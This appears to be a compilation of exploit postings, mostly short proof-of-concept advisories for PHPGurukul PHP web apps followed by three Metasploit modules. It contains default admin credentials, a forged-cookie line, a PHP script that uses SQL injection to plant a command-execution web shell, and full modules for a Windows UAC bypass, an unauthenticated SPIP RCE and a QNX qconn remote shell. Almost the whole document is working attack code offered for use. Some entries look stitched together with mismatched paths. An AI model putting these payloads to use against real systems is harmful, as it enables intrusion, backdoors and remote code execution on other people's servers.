<pre><code>====================================================================================================================================<br />| # Title : Emergency Ambulance Hiring Portal 1.0 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |<br />| # Vendor : https://phpgurukul.com/emergency-ambulance-hiring-portal-using-php-and-mysql/ |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking In Google Or Other Search Engine.<br /><br />[+] Insecure Settings : appears to leave a default administrative account in place post installation.<br /><br />[+] use payload : <br /><br /> Username: admin<br /> <br /> Password: Test@123<br /><br />[+] http://127.0.0.1/eahp/admin/dashboard.php<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Car Washing Management System 1.0 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |<br />| # Vendor : https://phpgurukul.com/car-washing-management-system-using-php-and-mysql/ |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking In Google Or Other Search Engine.<br /><br />[+] Insecure Settings : appears to leave a default administrative account in place post installation.<br /><br />[+] use payload : <br /><br /> Username: admin<br /> <br /> Password: Test@123<br /><br />[+] http://127.0.0.1/agms/admin/dashboard.php<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Bus Pass Management System 1.0 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |<br />| # Vendor : https://phpgurukul.com/bus-pass-management-system-using-php-and-mysql/ |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking In Google Or Other Search Engine.<br /><br />[+] Insecure Settings : appears to leave a default administrative account in place post installation.<br /><br />[+] use payload : <br /><br /> Username: admin<br /> <br /> Password: Test@123<br /><br />[+] http://127.0.0.1/buspassms/admin/dashboard.php<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : BP Monitoring Management System 1.0 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |<br />| # Vendor : https://phpgurukul.com/bp-monitoring-management-system-using-php-and-mysql/ |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking In Google Or Other Search Engine.<br /><br />[+] Insecure Settings : appears to leave a default administrative account in place post installation.<br /><br />[+] use payload : <br /><br /> Username: john@test.com<br /> <br /> Password: Test@123<br /><br />[+] http://127.0.0.1/bpmms/edit-family-member.php?fmid=1<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Beauty Parlour & Saloon Management System 1.1 Insecure Cookie Handling Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |<br />| # Vendor : https://phpgurukul.com/beauty-parlour-management-system-using-php-and-mysql/ |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking In Google Or Other Search Engine.<br /><br />[+] The default username is admin & The chosen password is user123<br /><br />[+] use payload : document.cookie = "username=user123; path=/; secure; HttpOnly; SameSite=Lax";<br /><br />[+] Refresh the page http://127.0.0.1/studentms/admin/login.php or go to http://127.0.0.1/studentms/admin/dashboard.php <br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Auto/Taxi Stand Management System 1.0 php code injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |<br />| # Vendor : https://phpgurukul.com/auto-taxi-stand-management-system-using-php-and-mysql/ |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking In Google Or Other Search Engine.<br /><br />[+] This payload injects php code containing a back door.<br /><br />[+] Line 16 + 19 Set your Target.<br /><br />[+] save payload as poc.php<br /><br />[+] usage from cmd : C:\www\test>php 1.php<br /><br />[+] payload :<br /><br /><?php<br />// Required libraries<br />function send_request($url, $data) {<br />    $options = [<br />        'http' => [<br />            'header' => "Content-Type: application/x-www-form-urlencoded\r\n",<br />            'method' => 'POST',<br />            'content' => http_build_query($data),<br />        ]<br />    ];<br />    $context = stream_context_create($options);<br />    return file_get_contents($url, false, $context);<br />}<br /><br />// Fixed target URL<br />$url = 'http://localhost/atsms/';<br /><br />// Fixed path where the file is written<br />$path = 'C:\www\atsms\uploaded.php';<br />$path = str_replace("\\", "\\\\", $path);<br /><br />// Backdoor payload<br />$backdoor_payload = '<?php if (isset($_GET["cmd"])) { system($_GET["cmd"]); } ?>';<br /><br />// Send a PHP file containing the backdoor<br />$payload = [<br />    'username' => "admin' union select '" . addslashes($backdoor_payload) . "' into outfile '" . $path . "' -- 'a",<br />    'password' => 'test',<br />    'login' => ''<br />];<br />send_request($url . "/admin/index.php", $payload);<br /><br />echo "[+] PHP backdoor uploaded successfully at $path\n";<br /><br />// Execute the uploaded PHP file and test the backdoor<br />$response = file_get_contents($url . "uploaded.php?cmd=whoami");<br />echo "[+] Response from the backdoor (executing 'whoami'): \n$response\n";<br />?><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Art Gallery Management System 1.0 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |<br />| # Vendor : https://phpgurukul.com/art-gallery-management-system-using-php-and-mysql/ |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking In Google Or Other Search Engine.<br /><br />[+] Insecure Settings : appears to leave a default administrative account in place post installation.<br /><br />[+] use payload : <br /><br /> Username: john@test.com<br /> <br /> Password: Test@123<br /><br />[+] http://127.0.0.1/agms/admin/dashboard.php<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Local<br />  Rank = ExcellentRanking<br /><br />  include Post::Windows::Priv<br />  include Post::Windows::Runas<br /><br />  def initialize(info = {})<br />    super(update_info(info,<br />      'Name' => 'Windows Escalate UAC Execute RunAs',<br />      'Description' => %q(<br />        This module will attempt to elevate execution level using<br />        the ShellExecute undocumented RunAs flag to bypass low<br />        UAC settings.<br />      ),<br />      'License' => MSF_LICENSE,<br />      'Author' => [<br />        'mubix', # Original technique<br />        'b00stfr3ak' # Added powershell option<br />      ],<br />      'Platform' => ['win'],<br />      'SessionTypes' => ['meterpreter'],<br />      'Targets' => [['Windows', {}]],<br />      'DefaultTarget' => 0,<br />      'DisclosureDate' => '2012-01-03'<br />    ))<br /><br />    register_options([<br />      OptString.new('FILENAME', [false, 'File name on disk']),<br />      OptString.new('PATH', [false, 'Location on disk, %TEMP% used if not set']),<br />      OptEnum.new('TECHNIQUE', [true, 'Technique to use', 'EXE', %w(PSH EXE)]),<br />    ])<br />  end<br /><br />  def exploit<br />    if is_uac_enabled?<br />      print_status 'UAC is Enabled, checking level...'<br />      case get_uac_level<br />      when UAC_NO_PROMPT<br />        print_good 'UAC is not enabled, no prompt for the user'<br />      else<br />        print_status "The user will be prompted, wait for them to click 'Ok'"<br />      end<br />    else<br />      print_good 'UAC is not enabled, no prompt for the user'<br />    end<br /><br />    case datastore['TECHNIQUE']<br />    when 'EXE'<br />      shell_execute_exe(datastore['FILENAME'], datastore['PATH'])<br />    when 'PSH'<br />      shell_execute_psh<br />    end<br />  end<br />end<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br />  Rank = ExcellentRanking<br /><br />  include Msf::Payload::Php<br />  include Msf::Exploit::Remote::HttpClient<br />  include Msf::Exploit::Remote::HTTP::Spip<br />  prepend Msf::Exploit::Remote::AutoCheck<br /><br />  def initialize(info = {})<br />    super(<br />      update_info(<br />        info,<br />        'Name' => 'SPIP BigUp Plugin Unauthenticated RCE',<br />        'Description' => %q{<br />          This module exploits a Remote Code Execution vulnerability in the BigUp plugin of SPIP.<br />          The vulnerability lies in the `lister_fichiers_par_champs` function, which is triggered<br />          when the `bigup_retrouver_fichiers` parameter is set to any value. By exploiting the improper<br />          handling of multipart form data in file uploads, an attacker can inject and execute<br />          arbitrary PHP code on the target server.<br /><br />          This critical vulnerability affects all versions of SPIP from 4.0 up to and including<br />          4.3.1, 4.2.15, and 4.1.17. It allows unauthenticated users to execute arbitrary code<br />          remotely via the public interface. The vulnerability has been patched in versions<br />          4.3.2, 4.2.16, and 4.1.18.<br />        },<br />        'Author' => [<br />          'Vozec', # Vulnerability Discovery<br />          'Laluka', # Vulnerability Discovery<br />          'Julien Voisin', # Code Review<br />          'Valentin Lobstein' # Metasploit Module<br />        ],<br />        'License' => MSF_LICENSE,<br />        'References' => [<br />          ['CVE', '2024-8517'],<br />          ['URL', 'https://thinkloveshare.com/hacking/spip_preauth_rce_2024_part_2_a_big_upload/'],<br />          ['URL', 'https://blog.spip.net/Mise-a-jour-critique-de-securite-sortie-de-SPIP-4-3-2-SPIP-4-2-16-SPIP-4-1-18.html']<br />        ],<br />        'Platform' => %w[php unix linux win],<br />        'Arch' => %w[ARCH_PHP ARCH_CMD],<br />        'Targets' => [<br />          [<br />            'PHP In-Memory', {<br />              'Platform' => 'php',<br />              'Arch' => ARCH_PHP<br />              # tested with php/meterpreter/reverse_tcp<br />            }<br />          ],<br />          [<br />            'Unix/Linux Command Shell', {<br />              'Platform' => %w[unix linux],<br />              'Arch' => ARCH_CMD<br />              # tested with cmd/linux/http/x64/meterpreter/reverse_tcp<br />            }<br />          ],<br />          [<br />            'Windows Command Shell', {<br />              'Platform' => 'win',<br />              'Arch' => ARCH_CMD<br />              # tested with cmd/windows/http/x64/meterpreter/reverse_tcp<br />            }<br />          ]<br />        ],<br />        'DefaultTarget' => 0,<br />        'Privileged' => false,<br />        'DisclosureDate' => '2024-09-06',<br />        'Notes' => {<br />          'Stability' => [CRASH_SAFE],<br />          'Reliability' => [REPEATABLE_SESSION],<br />          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]<br />        }<br />      )<br />    )<br />    register_options(<br />      [<br />        OptString.new('FORM_PAGE', [true, 'A page with a form.', 'Auto'])<br />      ]<br />    )<br />  end<br /><br />  def check<br />    rversion = spip_version || spip_plugin_version('spip')<br />    return Exploit::CheckCode::Unknown('Unable to determine the version of SPIP') unless rversion<br /><br />    print_status("SPIP Version detected: #{rversion}")<br /><br />    vulnerable_ranges = [<br />      { start: Rex::Version.new('4.0.0'), end: Rex::Version.new('4.1.17') },<br />      { start: Rex::Version.new('4.2.0'), end: Rex::Version.new('4.2.15') },<br />      { start: Rex::Version.new('4.3.0'), end: Rex::Version.new('4.3.1') }<br />    ]<br /><br />    is_vulnerable = vulnerable_ranges.any? { |range| rversion.between?(range[:start], range[:end]) }<br /><br />    unless is_vulnerable<br />      return CheckCode::Safe("The detected SPIP version (#{rversion}) is not vulnerable.")<br />    end<br /><br />    print_good("SPIP version #{rversion} is vulnerable.")<br />    plugin_version = spip_plugin_version('bigup')<br /><br />    unless plugin_version<br />      print_warning('Could not determine the version of the bigup plugin.')<br />      return CheckCode::Appears("The detected SPIP version (#{rversion}) is vulnerable.")<br />    end<br /><br />    print_status("Bigup plugin version detected: #{plugin_version}")<br />    if plugin_version < Rex::Version.new('3.2.12')<br />      return CheckCode::Appears("Both the detected SPIP version (#{rversion}) and bigup version (#{plugin_version}) are vulnerable.")<br />    end<br /><br />    CheckCode::Appears("The detected SPIP version (#{rversion}) is vulnerable.")<br />  end<br /><br />  # This function tests several pages to find a form with a valid CSRF token and its corresponding action.<br />  # It allows the user to specify a URL via the FORM_PAGE option (e.g., spip.php?article1).<br />  # We need to check multiple pages because the configuration of SPIP can vary.<br />  def get_form_data<br />    pages = %w[login spip_pass contact]<br /><br />    if datastore['FORM_PAGE']&.downcase != 'auto'<br />      pages = [datastore['FORM_PAGE']]<br />    end<br /><br />    pages.each do |page|<br />      url = normalize_uri(target_uri.path, page.start_with?('/') ? page : "spip.php?page=#{page}")<br />      res = send_request_cgi('method' => 'GET', 'uri' => url)<br /><br />      next unless res&.code == 200<br /><br />      doc = res.get_html_document<br />      action = doc.at_xpath("//input[@name='formulaire_action']/@value")&.text<br />      args = doc.at_xpath("//input[@name='formulaire_action_args']/@value")&.text<br /><br />      next unless action && args<br /><br />      print_status("Found formulaire_action: #{action}")<br />      print_status("Found formulaire_action_args: #{args[0..20]}...")<br />      return { action: action, args: args }<br />    end<br /><br />    nil<br />  end<br /><br />  # This function generates PHP code to execute a given payload on the target.<br />  # We use Rex::RandomIdentifier::Generator to create a random variable name to avoid conflicts.<br />  # The payload is encoded in base64 to prevent issues with special characters.<br />  # The generated PHP code includes the necessary preamble and system block to execute the payload.<br />  # This approach allows us to test multiple functions and not limit ourselves to potentially dangerous functions like 'system' which might be disabled.<br />  def php_exec_cmd(encoded_payload)<br />    vars = Rex::RandomIdentifier::Generator.new<br />    dis = "$#{vars[:dis]}"<br />    encoded_clean_payload = Rex::Text.encode_base64(encoded_payload)<br />    <<-END_OF_PHP_CODE<br />    #{php_preamble(disabled_varname: dis)}<br />    $c = base64_decode("#{encoded_clean_payload}");<br />    #{php_system_block(cmd_varname: '$c', disabled_varname: dis)}<br />    END_OF_PHP_CODE<br />  end<br /><br />  def exploit<br />    form_data = get_form_data<br /><br />    unless form_data<br />      fail_with(Failure::NotFound, 'Could not retrieve formulaire_action or formulaire_action_args value from any page.')<br />    end<br /><br />    print_status('Preparing to send exploit payload to the target...')<br /><br />    phped_payload = target['Arch'] == ARCH_PHP ? payload.encoded : php_exec_cmd(payload.encoded)<br />    b64_payload = framework.encoders.create('php/base64').encode(phped_payload).gsub(';', '')<br /><br />    post_data = Rex::MIME::Message.new<br /><br />    # This line is necessary for the form to be valid, works in tandem with formulaire_action_args<br />    post_data.add_part(form_data[:action], nil, nil, 'form-data; name="formulaire_action"')<br /><br />    # This value is necessary for $_FILES to be used and for the bigup plugin to be "activated" for this request, thus triggering the vulnerability<br />    post_data.add_part(Rex::Text.rand_text_alphanumeric(4, 8), nil, nil, 'form-data; name="bigup_retrouver_fichiers"')<br /><br />    # Injection is performed here. The die() function is used to avoid leaving traces in the logs,<br />    # prevent errors, and stop the execution of PHP after the injection.<br />    post_data.add_part('', nil, nil, "form-data; name=\"#{Rex::Text.rand_text_alphanumeric(4, 8)}['.#{b64_payload}.die().']\"; filename=\"#{Rex::Text.rand_text_alphanumeric(4, 8)}\"")<br /><br />    # This is necessary for the form to be accepted<br />    post_data.add_part(form_data[:args], nil, nil, 'form-data; name="formulaire_action_args"')<br /><br />    send_request_cgi({<br />      'method' => 'POST',<br />      'uri' => normalize_uri(target_uri.path, 'spip.php'),<br />      'ctype' => "multipart/form-data; boundary=#{post_data.bound}",<br />      'data' => post_data.to_s<br />    }, 1)<br />  end<br />end<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br />  Rank = ExcellentRanking<br /><br />  include Msf::Exploit::Remote::Tcp<br />  prepend Msf::Exploit::Remote::AutoCheck<br /><br />  def initialize(info = {})<br />    super(<br />      update_info(<br />        info,<br />        'Name' => 'QNX qconn Command Execution',<br />        'Description' => %q{<br />          This module uses the qconn daemon on QNX systems to gain a shell.<br /><br />          The QNX qconn daemon does not require authentication and allows<br />          remote users to execute arbitrary operating system commands.<br /><br />          This module has been tested successfully on QNX Neutrino 6.5.0 (x86)<br />          and 6.5.0 SP1 (x86).<br />        },<br />        'License' => MSF_LICENSE,<br />        'Author' => [<br />          'David Odell', # Discovery<br />          'Mor!p3r', # PoC<br />          'bcoles' # Metasploit<br />        ],<br />        'References' => [<br />          ['EDB', '21520'],<br />          ['URL', 'https://www.optiv.com/blog/pentesting-qnx-neutrino-rtos'],<br />          ['URL', 'http://www.qnx.com/developers/docs/6.5.0SP1/neutrino/utilities/q/qconn.html'],<br />          ['URL', 'http://www.qnx.com/developers/docs/6.5.0/topic/com.qnx.doc.neutrino_utilities/q/qconn.html']<br />        ],<br />        'Payload' => {<br />          'BadChars' => '',<br />          'DisableNops' => true,<br />          'Compat' => {<br />            'PayloadType' => 'cmd_interact',<br />            'ConnectionType' => 'find'<br />          }<br />        },<br />        'DefaultOptions' => {<br />          'WfsDelay' => 10,<br />          'PAYLOAD' => 'cmd/unix/interact'<br />        },<br />        'Platform' => 'unix', # QNX Neutrino<br />        'Arch' => ARCH_CMD,<br />        'Targets' => [['Automatic', {}]],<br />        'Privileged' => false,<br />        'DisclosureDate' => '2012-09-04',<br />        'DefaultTarget' => 0,<br />        'Notes' => {<br />          'Stability' => [CRASH_SAFE],<br />          'Reliability' => [REPEATABLE_SESSION],<br />          'SideEffects' => []<br />        }<br />      )<br />    )<br />    register_options(<br />      [<br />        Opt::RPORT(8000),<br />        OptString.new('SHELL', [true, 'Path to system shell', '/bin/sh'])<br />      ]<br />    )<br />  end<br /><br />  def check<br />    vprint_status('Sending check...')<br /><br />    connect<br />    res = sock.get_once(-1, 10)<br /><br />    return CheckCode::Unknown('Connection failed') unless res<br /><br />    return CheckCode::Safe unless res.include?('QCONN')<br /><br />    sock.put("service launcher\n")<br />    res = sock.get_once(-1, 10)<br /><br />    return CheckCode::Safe unless res.to_s.include?('OK')<br /><br />    fingerprint = Rex::Text.rand_text_alphanumeric(5..10)<br />    sock.put("start/flags run /bin/echo /bin/echo #{fingerprint}\n")<br /><br />    return CheckCode::Safe unless res.to_s.include?('OK')<br /><br />    Rex.sleep(1)<br /><br />    res = sock.get_once(-1, 10)<br /><br />    return CheckCode::Safe unless res.to_s.include?(fingerprint)<br /><br />    disconnect<br /><br />    CheckCode::Vulnerable<br />  end<br /><br />  def exploit<br />    connect<br />    res = sock.get_once(-1, 10)<br /><br />    fail_with(Failure::Unreachable, 'Connection failed') unless res<br /><br />    fail_with(Failure::UnexpectedReply, 'Unexpected reply') unless res.include?('QCONN')<br /><br />    sock.put("service launcher\n")<br />    res = sock.get_once(-1, 10)<br /><br />    fail_with(Failure::UnexpectedReply, 'Unexpected reply') unless res.to_s.include?('OK')<br /><br />    print_status('Sending payload...')<br />    sock.put("start/flags run #{datastore['SHELL']} -\n")<br /><br />    Rex.sleep(1)<br /><br />    fail_with(Failure::UnexpectedReply, 'Shell negotiation failed. Unexpected reply.') unless negotiate_shell(sock)<br /><br />    print_good('Payload sent successfully')<br /><br />    handler<br />  end<br /><br />  def negotiate_shell(sock)<br />    Timeout.timeout(15) do<br />      loop do<br />        data = sock.get_once(-1, 10)<br /><br />        return if data.blank?<br /><br />        if data.include?('#') || data.include?('No controlling tty')<br />          return true<br />        end<br /><br />        Rex.sleep(0.5)<br />      end<br />    end<br />  rescue ::Timeout::Error<br />    return nil<br />  end<br />end<br /></code></pre>